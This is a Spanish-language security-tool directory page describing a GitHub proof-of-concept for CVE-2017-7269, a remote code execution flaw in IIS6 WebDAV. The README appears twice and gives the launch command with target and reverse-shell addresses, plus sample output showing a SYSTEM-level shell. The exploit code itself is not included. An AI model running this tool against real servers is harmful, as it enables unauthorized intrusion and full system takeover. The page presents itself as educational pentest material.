Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-7269 — es una herramienta PoC que demuestra un exploit para una vulnerabilidad conocida en el componente WebDAV de IIS6 | Kitploit
Herramientas/GitHubGitHub/geniuszly/cve-2017-7269
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubgeniuszly/cve-2017-7269

CVE-2017-7269

es una herramienta PoC que demuestra un exploit para una vulnerabilidad conocida en el componente WebDAV de IIS6

Ver Repositorio
42hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

EN

GenWebDavIISExploit es una herramienta PoC que demuestra la explotación de una vulnerabilidad conocida en el componente WebDAV de IIS6. Esta herramienta está diseñada con fines educativos y de investigación para mostrar cómo se puede aprovechar la vulnerabilidad para ejecutar código arbitrario en un servidor remoto.

Descargo de responsabilidad

Este proyecto está pensado únicamente con fines educativos. Usa esta herramienta de forma responsable y solo en sistemas que poseas o para los que tengas permiso explícito de realizar pruebas. El acceso no autorizado a sistemas informáticos es ilegal.

Características

  • Ejecución remota de código en servidores IIS6 WebDAV vulnerables.
  • Generación dinámica de payload con IP y puerto de conexión inversa especificados por el usuario.
  • Interfaz de línea de comandos fácil de usar para una explotación rápida.

Requisitos

  • Python 3.x: Asegúrate de que Python 3 esté instalado en tu sistema.
  • Acceso a la red: Capacidad para conectarte a la IP y al puerto de la máquina objetivo.

Uso

Argumentos de línea de comandos

  • Target IP: La dirección IP del servidor IIS6 WebDAV objetivo.
  • Target Port: El número de puerto en el que se ejecuta el servicio WebDAV (normalmente 80).
  • Reverse IP: Tu dirección IP a la que debe conectarse la reverse shell.
  • Reverse Port: El número de puerto en tu sistema para recibir la reverse shell.

Ejemplo

root@kitploit:~
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>

Ejemplo de uso

root@kitploit:~
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

Ejemplo de salida

root@kitploit:~
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...

[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Настройка IP Windows

   Адаптер Ethernet Local Area Connection:
      DNS-суффикс подключения . . . . . : example.local
      IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
      Маска подсети . . . . . . . . . . : 255.255.255.0
      Основной шлюз . . . . . . . . . . : 192.168.1.1
    

Notas

  • Asegúrate de tener un listener en ejecución en el puerto de conexión inversa especificado para capturar la reverse shell entrante.
  • Usa esta herramienta únicamente en sistemas autorizados para probar vulnerabilidades.

RU

GenWebDavIISExploit es una herramienta PoC que demuestra la explotación de una vulnerabilidad conocida en el componente WebDAV de IIS6. Esta herramienta fue creada con fines educativos y de investigación para mostrar cómo se puede utilizar la vulnerabilidad para ejecutar código arbitrario en un servidor remoto.

Descargo de responsabilidad

Este proyecto está destinado únicamente a fines educativos. Usa esta herramienta de forma responsable y solo en sistemas que poseas o para los que tengas permiso explícito de realizar pruebas. El acceso no autorizado a sistemas informáticos es ilegal.

Características

  • Ejecución remota de código en servidores IIS6 WebDAV vulnerables.
  • Generación de payload dinámico con indicación de la IP y el puerto para la conexión inversa.
  • Interfaz de línea de comandos sencilla para un uso rápido.

Requisitos

  • Python 3.x: Asegúrate de que Python 3 esté instalado en tu sistema.
  • Acceso a la red: Capacidad para conectarte a la IP y al puerto de la máquina objetivo.

Uso

Argumentos de línea de comandos

  • Target IP: Dirección IP del servidor IIS6 WebDAV objetivo.
  • Target Port: Número de puerto en el que se ejecuta el servicio WebDAV (normalmente 80).
  • Reverse IP: Tu dirección IP a la que debe establecerse la conexión inversa.
  • Reverse Port: Número de puerto en tu sistema para recibir la conexión inversa.

Ejemplo

root@kitploit:~
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>

Ejemplo de uso

root@kitploit:~
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

Ejemplo de salida

root@kitploit:~
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...

[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Настройка IP Windows

   Адаптер Ethernet Local Area Connection:
      DNS-суффикс подключения . . . . . : example.local
      IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
      Маска подсети . . . . . . . . . . : 255.255.255.0
      Основной шлюз . . . . . . . . . . : 192.168.1.1
    

Notas

  • Asegúrate de tener un listener en ejecución en el puerto de conexión inversa especificado para interceptar la conexión inversa entrante.
  • Usa esta herramienta únicamente en sistemas autorizados para comprobar la presencia de vulnerabilidades.
Descargar herramienta